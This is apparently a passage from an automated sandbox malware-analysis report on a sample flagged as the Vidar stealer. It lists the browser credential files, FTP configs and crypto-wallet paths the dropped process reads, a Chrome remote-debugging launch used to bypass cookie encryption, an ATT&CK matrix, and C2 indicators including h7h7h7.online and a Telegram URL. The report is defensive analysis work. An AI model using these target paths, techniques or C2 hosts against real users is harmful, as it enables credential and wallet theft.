    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
    Tries to steal Crypto Currency Wallets
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior

    Remote Access Functionality

    barindex
    Attempt to bypass Chrome Application-Bound Encryption
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Yara detected Vidar stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation    		1
    DLL Side-Loading    		12
    Process Injection    		111
    Masquerading    		2
    OS Credential Dumping    		1
    Virtualization/Sandbox Evasion    		Remote Services11
    Input Capture    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts1
    Native API    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Virtualization/Sandbox Evasion    		11
    Input Capture    		3
    Process Discovery    		Remote Desktop Protocol1
    Archive Collected Data    		1
    Remote Access Software    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Extra Window Memory Injection    		12
    Process Injection    		Security Account Manager3
    File and Directory Discovery    		SMB/Windows Admin Shares3
    Data from Local System    		1
    Ingress Tool Transfer    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information    		NTDS15
    System Information Discovery    		Distributed Component Object Model1
    Clipboard Data    		3
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeylogging4
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Extra Window Memory Injection    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582918 Sample: CenteredDealing.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 92 46 h7h7h7.online 2->46 48 uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm 2->48 50 3 other IPs or domains 2->50 70 Suricata IDS alerts for network traffic 2->70 72 Yara detected Vidar stealer 2->72 74 Sigma detected: Search for Antivirus process 2->74 76 AI detected suspicious sample 2->76 10 CenteredDealing.exe 29 2->10         started        signatures3 process4 process5 12 cmd.exe 2 10->12         started        file6 38 C:\Users\user\AppData\Local\...\Rip.com, PE32 12->38 dropped 78 Drops PE files with a suspicious file extension 12->78 16 Rip.com 28 12->16         started        20 cmd.exe 1 12->20         started        22 cmd.exe 2 12->22         started        24 9 other processes 12->24 signatures7 process8 dnsIp9 40 h7h7h7.online 116.203.13.109, 443, 49737, 49739 HETZNER-ASDE Germany 16->40 42 t.me 149.154.167.99, 443, 49735 TELEGRAMRU United Kingdom 16->42 44 127.0.0.1 unknown unknown 16->44 62 Attempt to bypass Chrome Application-Bound Encryption 16->62 64 Tries to harvest and steal ftp login credentials 16->64 66 Tries to harvest and steal browser information (history, passwords, etc) 16->66 68 Tries to steal Crypto Currency Wallets 16->68 26 chrome.exe 16->26         started        29 cmd.exe 1 16->29         started        signatures10 process11 dnsIp12 52 192.168.2.4, 138, 443, 49547 unknown unknown 26->52 54 239.255.255.250 unknown Reserved 26->54 31 chrome.exe 26->31         started        34 conhost.exe 29->34         started        36 timeout.exe 1 29->36         started        process13 dnsIp14 56 play.google.com 142.250.181.238, 443, 49802, 49804 GOOGLEUS United States 31->56 58 www.google.com 142.250.185.196, 443, 49750, 49751 GOOGLEUS United States 31->58 60 2 other IPs or domains 31->60

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    CenteredDealing.exe8%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    No Antivirus matches

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    plus.l.google.com
    		142.250.181.238
    		truefalse
      		high
      play.google.com
      		142.250.181.238
      		truefalse
        		high
        t.me
        		149.154.167.99
        		truefalse
          		high
          h7h7h7.online
          		116.203.13.109
          		truetrue
            		unknown
            www.google.com
            		142.250.185.196
            		truefalse
              		high
              56.163.245.4.in-addr.arpa
              		unknown
              		unknownfalse
                		unknown
                18.31.95.13.in-addr.arpa
                		unknown
                		unknownfalse
                  		high
                  uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRm
                  		unknown
                  		unknownfalse
                    		unknown
                    apis.google.com
                    		unknown
                    		unknownfalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://t.me/w211etfalse
                        		high
                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtab26pzcb.12.drfalse
                            		high
                            https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=26pzcb.12.drfalse
                                		high
                                https://docs.google.com/document/Jchrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://anglebug.com/4633chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://anglebug.com/7382chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.6fcjw4.12.drfalse
                                        		high
                                        https://issuetracker.google.com/284462263chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://polymer.github.io/AUTHORS.txtchrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://docs.google.com/chrome.exe, 00000011.00000003.1974571089.000064DC00428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.google.com/document/:chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://anglebug.com/7714chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://drive.google.com/?lfhs=2chrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anglebug.com/6248chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000011.00000003.2002129163.000064DC01354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://anglebug.com/6929chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://anglebug.com/5281chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.youtube.com/?feature=ytcachrome.exe, 00000011.00000003.1975634639.000064DC0065C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc946fcjw4.12.drfalse
                                                                      		high
                                                                      https://issuetracker.google.com/255411748chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://anglebug.com/7246chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://anglebug.com/7369chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://anglebug.com/7489chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://chrome.google.com/webstorechrome.exe, 00000011.00000003.1981685293.000064DC00CDC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://drive-daily-2.corp.google.com/chrome.exe, 00000011.00000003.1974571089.000064DC00428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://polymer.github.io/PATENTS.txtchrome.exe, 00000011.00000003.1989256233.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988835700.000064DC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989628875.000064DC010A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988754691.000064DC00F3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988290844.000064DC00F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989177727.000064DC00CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989836718.000064DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988521146.000064DC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989308675.000064DC00F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989217305.000064DC009B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1988654291.000064DC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1989538471.000064DC00A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=26pzcb.12.drfalse
                                                                                      		high
                                                                                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta6fcjw4.12.drfalse
                                                                                        		high
                                                                                        http://www.autoitscript.com/autoit3/XRip.com, 0000000C.00000000.1707392543.00000000009C5000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drfalse
                                                                                          		high
                                                                                          https://issuetracker.google.com/161903006chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.ecosia.org/newtab/26pzcb.12.drfalse
                                                                                              		high
                                                                                              https://drive-daily-1.corp.google.com/chrome.exe, 00000011.00000003.1974571089.000064DC00428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://drive-daily-5.corp.google.com/chrome.exe, 00000011.00000003.1974571089.000064DC00428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://plus.google.comchromecache_87.19.drfalse
                                                                                                    		high
                                                                                                    http://anglebug.com/3078chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://anglebug.com/7553chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://anglebug.com/5375chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://anglebug.com/5371chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://anglebug.com/4722chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Zwchrome.exe, 00000011.00000003.2009464158.000064DC0157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009569085.000064DC015A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009505592.000064DC01590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2009420903.000064DC01578000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://anglebug.com/7556chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://drive-preprod.corp.google.com/chrome.exe, 00000011.00000003.1974571089.000064DC00428000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesjwt26x.12.drfalse
                                                                                                                      		high
                                                                                                                      https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2006713013.000064DC01498000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://anglebug.com/6692chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/3502chrome.exe, 00000011.00000003.1982061515.000064DC00C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981200237.000064DC0036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.1981955618.000064DC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
